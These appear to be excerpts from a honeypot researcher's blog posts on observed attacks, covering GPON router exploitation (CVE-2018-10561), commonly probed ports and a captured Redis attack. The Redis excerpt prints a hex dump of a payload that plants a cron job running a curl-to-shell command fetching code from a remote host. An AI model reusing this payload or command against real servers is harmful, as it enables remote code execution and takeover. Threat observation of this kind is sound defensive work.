Strange POST requests are directed at Glastopf… Several IP addresses have sent requests to random looking URLs ending in .php, URLs that are unlikely to exist anywhere unless someone specifically places them. They contain POST data like: ip=\\my_ip\\&port=8080&uuid=8cd96698-3207-49bb-a815-e0fb979c4a16 ip=\\my_ip\\&port=8080&uuid=c0aac97a-371f-4864-aaf1-c4afacbdbccf These are directed towards host checkrealtys.com, with a variety of useragent strings, including: BlackBerry9000/18.104.22.168 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.
I have to check this thing every day or I miss something. It’s not every day that I see something new - most days are the same things I’ve already seen and new copies of malware that’s basically the same as the old. This morning, however, I witnessed a tactic I had wondered if anyone considered employing in the past, but hadn’t actually observed evidence of. I had traffic showing an attacker attempting to exploit CVE-2017-10271, dropping software from hxxp://107.
It’s strange how attacks seem to move around on a weekly/monthly basis. Up until recently I saw a number of attacks against GPON, and today I don’t see a single one. There is some probability in this - I occupy only a small amount of IP space, so with a given number of attackers throwing a given number of attacks per second, some portion of the IP space less than 100% will be hit.
This morning on TCP 6379 I received an offer my computer, fortunately, refused. 2a310d0a24370d0a434f4d4d414e440d *1..$7..COMMAND. 0a2a340d0a24360d0a636f6e6669670d .*4..$6..config. 0a24330d0a7365740d0a2431300d0a64 .$3..set..$10..d 6266696c656e616d650d0a24390d0a62 bfilename..$9..b 61636b75702e64620d0a2a310d0a2434 ackup.db..*1..$4 0d0a736176650d0a2a310d0a24380d0a ..save..*1..$8.. 666c757368616c6c0d0a2a330d0a2433 flushall..*3..$3 0d0a7365740d0a24370d0a74726f6a61 ..set..$7..troja 6e310d0a2436340d0a0a2a2f31202a20 n1..$64...*/1 * 2a202a202a206375726c202d6673534c * * * curl -fsSL 20687474703a2f2f6368726f6d652e7a http://chrome.z 6572306461792e72753a353035302f6d er0day.ru:5050/m 727831207c2073680a0d0a rx1 | sh... Forget everything you know! Trojan time. The download link provided a shell script, which used both yum and apt-get to install a variety of dependencies, add an authorized ssh key to root, drop external connections to port 6379 via iptables (Bold move!
Here’s a guy who is pretty bold with his malware: hxxp://22.214.171.124/ <font size='12'> <center> IM HERE TO HACK UR BOTNET </center> </font> <font size='12'> <center> if ur a security researcher, follow my twitter @decayable, ill glady anwser any questions </center> </font> He shows up in my honeypot trying to use the GPON vulnerability to drop hxxp://126.96.36.199/w, which then tries to execute Mirai offshoot Okane on a variety of architectures. @decayable does not seem like one of the smarter script kiddies out there, but he/she is trying hard to sell some botnets…
I’ve edited this post over time, primarily trying to determine where the most common attacks are hitting. This analysis will lead to more focused analysis of the spots attackers are targeting. Most popular ports 15 May 18: 69 - tftp 445 - smb 8545 - not in /etc/services - maybe misconfigured ethereum client search 3389 - remote desktop 2323 - telnet alternative maybe 5555 - “personal-agent” - maybe just easy to type 5060 - sip - voip 6379 - maybe redis On 16 May 18, same ports largely, but also:
In Glastopf logs I see POST requests to /GponForm/diag_Form?images/. These exploitation attempts have started in the last couple weeks, and their intensity ebbs and flows. The attacks are related to CVE-2018-10561, a router vulnerability which came out on 3 May, and the attempts I’ve seen in the last couple days seem the most sophisticated. Earlier attacks seemed focused on determining whether the vulnerability was present, and dropping further attack code like the MIRAI binaries.